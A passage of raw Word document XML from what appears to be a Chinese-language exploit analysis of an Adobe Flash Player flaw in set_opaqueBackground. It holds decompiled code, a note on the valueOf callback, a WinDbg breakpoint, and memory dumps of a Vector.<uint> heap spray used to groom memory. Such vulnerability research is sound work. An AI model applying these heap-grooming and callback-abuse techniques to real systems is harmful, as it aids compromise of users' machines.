      <w:r>
        <w:t xml:space="preserve">      *(_DWORD *)(buf + 0x30C) &amp;= 0xFFFFFFFB;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    sub_10104280(1, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    if ( v5 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)(v5 + 0x1E0) = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    *(_DWORD *)(v3 + 0x20) |= 4u;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA7678" w:rsidRDefault="00CA7678" w:rsidP="00D71EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>set_opaqueBackground</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数首先判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackGroudObj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否存在，不存在则调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1025DC52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x390</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大小的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidR="00AC625F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，随后调用</w:t>
      </w:r>
      <w:r w:rsidR="00AC625F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>avmplus::AvmCore::integer</w:t>
      </w:r>
      <w:r w:rsidR="00AC625F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对写入的参数进行转换</w:t>
      </w:r>
      <w:r w:rsidR="00824CC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里如果传入的是</w:t>
      </w:r>
      <w:r w:rsidR="00824CC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Object </w:t>
      </w:r>
      <w:r w:rsidR="00824CC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会调用相应的</w:t>
      </w:r>
      <w:r w:rsidR="00824CC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r w:rsidR="00824CC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA7678" w:rsidRDefault="00CA7678" w:rsidP="00D71EFD"/>
    <w:p w:rsidR="00673A5B" w:rsidRDefault="00300ECF" w:rsidP="00D71EFD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过设置如下断点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可打印所有的分配</w:t>
      </w:r>
      <w:r w:rsidR="00134D8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BackgroudObj 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673A5B" w:rsidRDefault="00673A5B" w:rsidP="00D71EFD">
      <w:r w:rsidRPr="00673A5B">
        <w:t>bu Flash32_18_0_0_203!DllUnregisterServer+0x74868 ".echo allocate 0x390 obj;r eax"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D6733" w:rsidRDefault="002D6733" w:rsidP="00D71EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523ACE" w:rsidRDefault="002D6733" w:rsidP="00D71EFD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0097586C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dd eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523ACE" w:rsidRDefault="00523ACE" w:rsidP="00523ACE">
      <w:r>
        <w:t>09959418  080c4380 00000001 08d550b0 08d4e000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523ACE" w:rsidRDefault="00523ACE" w:rsidP="00523ACE">
      <w:r>
        <w:t>09959428  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523ACE" w:rsidRDefault="00523ACE" w:rsidP="00523ACE">
      <w:r>
        <w:t>09959438  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523ACE" w:rsidRDefault="00523ACE" w:rsidP="00523ACE">
      <w:r>
        <w:t>09959448  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523ACE" w:rsidRDefault="00523ACE" w:rsidP="00523ACE">
      <w:r>
        <w:t>09959458  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523ACE" w:rsidRDefault="00523ACE" w:rsidP="00523ACE">
      <w:r>
        <w:t>09959468  00000000 00000000 00000004 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523ACE" w:rsidRDefault="00523ACE" w:rsidP="00523ACE">
      <w:r>
        <w:t>09959478  00000001 00000000 00010000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673A5B" w:rsidRDefault="00523ACE" w:rsidP="00523ACE">
      <w:r>
        <w:t>09959488  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5234" w:rsidRDefault="00BD5234" w:rsidP="00523ACE"/>
    <w:p w:rsidR="00127592" w:rsidRDefault="00142D32" w:rsidP="00127592">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00127592">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Memory Layout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5AB2" w:rsidRPr="00BE5AB2" w:rsidRDefault="00536E19" w:rsidP="00127592">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行上面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句之后，</w:t>
      </w:r>
      <w:r w:rsidR="00127592">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时整个内存布局</w:t>
      </w:r>
      <w:r w:rsidR="00BE5AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以通过</w:t>
      </w:r>
      <w:r w:rsidR="00BE5AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windbg</w:t>
      </w:r>
      <w:r w:rsidR="00BE5AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的搜索命令获得</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0008639C" w:rsidRDefault="0008639C" w:rsidP="00127592"/>
    <w:p w:rsidR="0008639C" w:rsidRDefault="002116BD" w:rsidP="00127592">
      <w:r>
        <w:t>Vector.&lt;uint&gt;(_vLen);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cf1b0  00000062 08d42000 00000000 00000000  b.... .......... //vector1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cf340  00000062 08d42000 00000000 00000000  b.... .......... //vector2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cf4d0  00000062 08d42000 00000000 00000000  b.... .......... //.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cf660  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cf7f0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cf980  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cfb10  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cfca0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>093cfe30  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09474020  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>094741b0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09474340  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>094744d0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09474660  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>094747f0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09474980  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09474b10  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09474ca0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09474e30  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>09476020  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>094761b0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09476340  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>094764d0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09476660  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>094767f0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09476980  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09476b10  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09476ca0  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09476e30  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09954020  00000062 08d42000 00000000 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233"/>
    <w:p w:rsidR="004A6233" w:rsidRDefault="00426087" w:rsidP="004A6233">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00426087">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vector.&lt;uint&gt;(8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e390  00000008 08d42000 00000030 00000000  ..... ..0.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e688  00000008 08d42000 00000035 00000000  ..... ..5.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e6d8  00000008 08d42000 0000002f 00000000  ..... ../.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e7c8  00000008 08d42000 0000002e 00000000  ..... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e8b8  00000008 08d42000 00000031 00000000  ..... ..1.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e8e0  00000008 08d42000 00000032 00000000  ..... ..2.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e908  00000008 08d42000 00000034 00000000  ..... ..4.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e930  00000008 08d42000 00000033 00000000  ..... ..3.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e980  00000008 08d42000 00000036 00000000  ..... ..6.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e9a8  00000008 08d42000 00000037 00000000  ..... ..7.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e9d0  00000008 08d42000 00000038 00000000  ..... ..8.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3e9f8  00000008 08d42000 00000039 00000000  ..... ..9.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ea20  00000008 08d42000 0000003a 00000000  ..... ..:.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ea48  00000008 08d42000 0000003b 00000000  ..... ..;.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ea70  00000008 08d42000 0000003c 00000000  ..... ..&lt;.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ea98  00000008 08d42000 0000003d 00000000  ..... ..=.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eac0  00000008 08d42000 0000003e 00000000  ..... ..&gt;.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eae8  00000008 08d42000 0000003f 00000000  ..... ..?.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eb10  00000008 08d42000 00000040 00000000  ..... ..@.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eb38  00000008 08d42000 00000041 00000000  ..... ..A.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eb60  00000008 08d42000 00000042 00000000  ..... ..B.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eb88  00000008 08d42000 00000043 00000000  ..... ..C.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ebb0  00000008 08d42000 00000044 00000000  ..... ..D.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ebd8  00000008 08d42000 00000045 00000000  ..... ..E.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ec00  00000008 08d42000 00000046 00000000  ..... ..F.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ec28  00000008 08d42000 00000047 00000000  ..... ..G.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ec50  00000008 08d42000 00000048 00000000  ..... ..H.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ec78  00000008 08d42000 00000049 00000000  ..... ..I.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eca0  00000008 08d42000 0000004a 00000000  ..... ..J.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ecc8  00000008 08d42000 0000004b 00000000  ..... ..K.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ecf0  00000008 08d42000 0000004c 00000000  ..... ..L.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>08d3ed18  00000008 08d42000 0000004d 00000000  ..... ..M.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ed40  00000008 08d42000 0000004e 00000000  ..... ..N.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ed68  00000008 08d42000 0000004f 00000000  ..... ..O.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ed90  00000008 08d42000 00000050 00000000  ..... ..P.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3edb8  00000008 08d42000 00000051 00000000  ..... ..Q.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ede0  00000008 08d42000 00000052 00000000  ..... ..R.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ee08  00000008 08d42000 00000053 00000000  ..... ..S.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ee30  00000008 08d42000 00000054 00000000  ..... ..T.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ee58  00000008 08d42000 00000055 00000000  ..... ..U.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ee80  00000008 08d42000 00000056 00000000  ..... ..V.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eea8  00000008 08d42000 00000057 00000000  ..... ..W.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eed0  00000008 08d42000 00000058 00000000  ..... ..X.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3eef8  00000008 08d42000 00000059 00000000  ..... ..Y.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ef20  00000008 08d42000 0000005a 00000000  ..... ..Z.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ef48  00000008 08d42000 0000005b 00000000  ..... ..[.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ef70  00000008 08d42000 0000005c 00000000  ..... ..\.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3ef98  00000008 08d42000 0000005d 00000000  ..... ..].......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>08d3efc0  00000008 08d42000 0000005e 00000000  ..... ..^.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955020  00000008 08d42000 0000005f 00000000  ..... .._.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955048  00000008 08d42000 00000060 00000000  ..... ..`.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955070  00000008 08d42000 00000061 00000000  ..... ..a.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955098  00000008 08d42000 00000062 00000000  ..... ..b.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099550c0  00000008 08d42000 00000063 00000000  ..... ..c.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099550e8  00000008 08d42000 00000064 00000000  ..... ..d.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955110  00000008 08d42000 00000065 00000000  ..... ..e.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955138  00000008 08d42000 00000066 00000000  ..... ..f.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955160  00000008 08d42000 00000067 00000000  ..... ..g.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955188  00000008 08d42000 00000068 00000000  ..... ..h.......</w:t>
      </w:r>
    </w:p>
